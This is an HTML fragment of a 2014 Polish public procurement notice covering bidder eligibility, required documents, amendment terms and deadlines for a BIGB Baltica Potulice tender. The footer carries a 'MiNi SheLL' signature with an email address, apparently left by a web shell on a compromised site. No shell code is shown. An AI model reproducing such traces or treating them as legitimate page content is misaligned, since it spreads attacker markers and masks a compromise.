<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
2) posiadania wiedzy i doświadczenia
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
4) sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą brak podstaw do wykluczenia z niniejszego postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp.
3.	Opis sposobu dokonywania oceny spełniania warunków w niniejszym postępowaniu.
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki.
2) Zamawiający dokona oceny spełnienia warunków udziału określonych w art. 22 ust. 1 i w art. 24 ustawy Pzp, które zostały również określone w siwz w rozdziale VIII pkt 1 i pkt 2, na podstawie złożonych do oferty oświadczeń i dokumentów, o których mowa w siwz rozdział IX.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1) nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 6 pkt 1 i lub pkt 2
2) cen artykułów wymienionych w załączniku nr 1 do umowy, o kwotę nie większą niż wynikającą ze wskaźnika cen towarów i usług konsumpcyjnych, podanego przez GUS publikowanego na stronie internetowej: www.stat.gov.pl. Wskaźnik cen towarów i usług konsumpcyjnych liczony jest miesięcznie od terminu obowiązywania umowy, o którym mowa w § 2 pkt 1
3) urzędowej stawki podatku VAT na artykuły wymienione w załączniku nr 1 do umowy
4) każdej zmiany, która jest korzystna lub neutralna dla zamawiającego
5) zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego
6) terminu zakończenia (przedłużenia) obowiązywania niniejszej umowy, o którym mowa w § 2 pkt 1, z zastrzeżeniem § 3 pkt 3
7) dopisania do § 5 pkt 1 ppkt 1 magazynu zlokalizowanego w Chełmnie, ul. 22 stycznia 3a
3. Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu, z zastrzeżeniem pkt 5 i pkt 6.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbaltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA O/POTULICE
UL.Aleja Parkowa 1
89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2014 godzina 12:00, miejsce: BIGB BALTICA O/POTULICE
UL.Aleja Parkowa 1
89-120 Potulice /sekretariat ZK w Potulicach/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com